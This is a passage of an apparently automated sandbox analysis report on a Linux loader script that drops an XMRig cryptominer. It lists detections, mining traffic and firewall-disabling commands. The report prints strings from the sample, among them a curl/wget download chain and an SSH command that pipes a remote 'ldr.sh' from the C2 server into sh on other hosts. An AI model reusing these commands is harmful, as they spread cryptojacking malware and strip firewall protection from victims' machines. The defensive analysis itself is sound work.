    • sh New Fork (PID: 4357, Parent: 2676)
    • cat (PID: 4357, Parent: 2676, MD5: efa10d52f37361f2e3a5d22742f0fcc4) Arguments: cat /dev/null
  • cleanup

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
28e9b_ldr.shSUSP_LNX_Linux_Malware_Indicators_Aug20_1Detects indicators often found in linux malware samplesFlorian Roth
  • 0x2e8:$s1: && chmod +x
  • 0x2a3:$s3: /tmp
  • 0x94c:$s3: /tmp
  • 0x953:$s3: /tmp
  • 0x119:$s4: |curl
28e9b_ldr.shJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    /bin/ytdgwkJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
      /bin/ytdgwkJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security
        /bin/ytdgwkJoeSecurity_XmrigYara detected Xmrig cryptocurrency minerJoe Security

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Antivirus detection for dropped fileShow sources
          Source: /tmp/8267b26db341Avira: detection malicious, Label: LINUX/CoinMiner.lsfus

          Bitcoin Miner:

          barindex
          Yara detected Xmrig cryptocurrency minerShow sources
          Source: Yara matchFile source: 28e9b_ldr.sh, type: SAMPLE
          Source: Yara matchFile source: /bin/ytdgwk, type: DROPPED
          Source: Yara matchFile source: /bin/ytdgwk, type: DROPPED
          Source: Yara matchFile source: /bin/ytdgwk, type: DROPPED
          Detected Stratum mining protocolShow sources
          Source: global trafficTCP traffic: 192.168.1.100:58330 -> 194.145.227.21:5443 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"x","pass":"x","agent":"xmrig/6.4.0 (linux x86_64) libuv/1.38.1 gcc/9.3.0","algo":["cn/1","cn/2","cn/r","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/wrkz","astrobwt"]}}.
          Found strings related to Crypto-MiningShow sources
          Source: ytdgwk.449.drString found in binary or memory: stratum+ssl://randomx.xmrig.com:443
          Source: ytdgwk.449.drString found in binary or memory: cryptonight/0
          Source: ytdgwk.449.drString found in binary or memory: -o, --url=URL URL of mining server
          Source: ytdgwk.449.drString found in binary or memory: stratum+tcp://
          Source: ytdgwk.449.drString found in binary or memory: Usage: xmrig [OPTIONS]
          Source: ytdgwk.449.drString found in binary or memory: XMRig 6.4.0
          Tries to load the MSR kernel module used for reading/writing to CPUs model specific registerShow sources
          Source: /bin/sh (PID: 4515)Modprobe: /sbin/modprobe -> /sbin/modprobe msrJump to behavior
          Writes to CPU model specific registers (MSR) (e.g. miners improve performance by disabling HW prefetcher)Show sources
          Source: kthreaddk (PID: 4501)MSR open for writing: /dev/cpu/0/msrJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from proc file: /proc/cpuinfoJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/thread_siblingsJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_idJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/core_siblingsJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/topology/physical_package_idJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/shared_cpu_mapJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/levelJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/typeJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/sizeJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/coherency_line_sizeJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/number_of_setsJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index0/physical_line_partitionJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/shared_cpu_mapJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/levelJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index1/typeJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/shared_cpu_mapJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/levelJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/typeJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/sizeJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/coherency_line_sizeJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/number_of_setsJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index2/physical_line_partitionJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/shared_cpu_mapJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/levelJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/typeJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/sizeJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/coherency_line_sizeJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/number_of_setsJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/cpu0/cache/index3/physical_line_partitionJump to behavior
          Source: kthreaddk (PID: 4499)Reads CPU info from /sys: /sys/devices/system/cpu/possibleJump to behavior

          Spreading:

          barindex
          Found strings indicative of a multi-platform dropperShow sources
          Source: 28e9b_ldr.shString: curl -k $1>$2||wget --no-check-certificate -q -O- $1>$2||curl $1>$2||wget -q -O- $1>$2
          Source: 28e9b_ldr.shString: ssh -oStrictHostKeyChecking=no -oBatchMode=yes -oConnectTimeout=5 -i $key $user@$host "(curl $cc/ldr.sh?localssh||wget -q -O- $cc/ldr.sh?localssh)|sh"

          Networking:

          barindex
          Deletes all firewall rulesShow sources
          Source: /lib/ufw/ufw-init (PID: 2766)Args: iptables -F ufw-logging-denyJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2792)Args: iptables -F ufw-logging-allowJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2793)Args: iptables -F ufw-not-localJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2797)Args: iptables -F ufw-user-logging-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2802)Args: iptables -F ufw-user-limit-acceptJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2807)Args: iptables -F ufw-user-limitJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2810)Args: iptables -F ufw-skip-to-policy-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2815)Args: iptables -F ufw-reject-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2819)Args: iptables -F ufw-after-logging-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2823)Args: iptables -F ufw-after-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2830)Args: iptables -F ufw-user-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2835)Args: iptables -F ufw-before-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2841)Args: iptables -F ufw-before-logging-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2849)Args: iptables -F ufw-skip-to-policy-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2858)Args: iptables -F ufw-reject-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2863)Args: iptables -F ufw-after-logging-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2869)Args: iptables -F ufw-after-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2874)Args: iptables -F ufw-user-logging-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2881)Args: iptables -F ufw-user-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2887)Args: iptables -F ufw-before-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2897)Args: iptables -F ufw-before-logging-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2902)Args: iptables -F ufw-track-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2910)Args: iptables -F ufw-track-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2913)Args: iptables -F ufw-track-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2921)Args: iptables -F ufw-skip-to-policy-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2929)Args: iptables -F ufw-reject-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2935)Args: iptables -F ufw-after-logging-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2944)Args: iptables -F ufw-after-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2951)Args: iptables -F ufw-user-logging-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2957)Args: iptables -F ufw-user-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2963)Args: iptables -F ufw-before-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2968)Args: iptables -F ufw-before-logging-outputJump to behavior
          Source: /bin/sh (PID: 3748)Args: iptables -FJump to behavior
          Disables Ubuntu's Uncomplicated Firewall (UFW)Show sources
          Source: /bin/sh (PID: 2685)UFW: /usr/sbin/ufw -> /usr/bin/python3 /usr/sbin/ufw disableJump to behavior
          Executes the "iptables" command to insert, remove and/or manipulate rulesShow sources
          Source: /lib/ufw/ufw-init (PID: 2766)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-logging-denyJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2792)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-logging-allowJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2793)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-not-localJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2797)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-logging-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2802)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-limit-acceptJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2807)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-limitJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2810)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-skip-to-policy-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2815)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-reject-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2819)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-logging-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2823)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2830)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2835)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2841)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-logging-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2849)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-skip-to-policy-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2858)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-reject-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2863)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-logging-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2869)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2874)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-logging-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2881)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2887)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2897)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-logging-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2902)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-track-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2910)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-track-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2913)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-track-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2921)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-skip-to-policy-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2929)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-reject-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2935)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-logging-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2944)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-after-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2951)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-logging-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2957)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-user-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2963)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 2968)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -F ufw-before-logging-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3171)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-logging-denyJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3176)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-logging-allowJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3182)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-not-localJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3188)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-logging-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3195)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-logging-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3200)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-logging-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3208)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-limit-acceptJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3213)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-limitJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3219)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3224)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3230)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-user-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3236)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-skip-to-policy-inputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3244)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-skip-to-policy-outputJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3249)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -X ufw-skip-to-policy-forwardJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3254)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P INPUT ACCEPTJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3261)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P OUTPUT ACCEPTJump to behavior
          Source: /lib/ufw/ufw-init (PID: 3266)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P FORWARD ACCEPTJump to behavior
          Source: /bin/sh (PID: 3733)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P INPUT ACCEPTJump to behavior
          Source: /bin/sh (PID: 3740)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P OUTPUT ACCEPTJump to behavior
          Source: /bin/sh (PID: 3744)Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -P FORWARD ACCEPTJump to behavior
          Uses known network protocols on non-standard portsShow sources
          Source: unknownNetwork traffic detected: HTTP traffic on port 36368 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47294 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 42792 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41038 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35406 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 44834 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 54420 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36118 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43326 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57914 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 40812 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 48834 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 54994 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59066 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57552 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59510 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50088 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33306 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41506 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55734 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36316 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 32822 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 40632 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53966 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34224 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35942 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 40440 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34788 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47770 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34282 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 43874 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36796 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52984 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 7001 -> 54420
          Source: unknownNetwork traffic detected: HTTP traffic on port 52454 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41038 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 42792 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 56534 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 54404 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51182 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53954 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35406 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50956 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 46494 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58540 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41284 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 49354 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 7001 -> 54994
          Source: unknownNetwork traffic detected: HTTP traffic on port 33364 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 56904 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34886 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34378 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55918 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 49580 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51356 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36732 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57552 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59066 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36806 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 48834 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33306 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53966 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55734 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57604 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41506 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 32822 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47594 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 42792 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41038 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59510 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35406 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34378 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55918 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34224 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 46802 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39748 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51182 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53954 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 7001 -> 47594
          Source: unknownNetwork traffic detected: HTTP traffic on port 40440 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35942 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34788 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34282 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47770 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52984 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57960 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34886 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41284 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33364 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 49354 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 54404 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 56534 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57604 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58272 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58540 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57552 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59066 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36038 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34378 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53966 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55918 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33306 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55734 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41506 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 32822 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36806 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36018 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 49580 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34224 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57960 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34886 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 39748 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58272 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 51182 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41038 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 42792 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53954 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35406 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 48834 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 50552 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59510 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57604 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41284 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33364 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 49354 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34378 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55918 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57552 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 59066 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 58272 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 53966 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 40440 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 35942 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34788 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 34282 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 33306 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 47770 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 52984 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 55734 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 32822 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 41506 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 57960 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 54404 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 56534 -> 7001
          Source: unknownNetwork traffic detected: HTTP traffic on port 36806 -> 7001
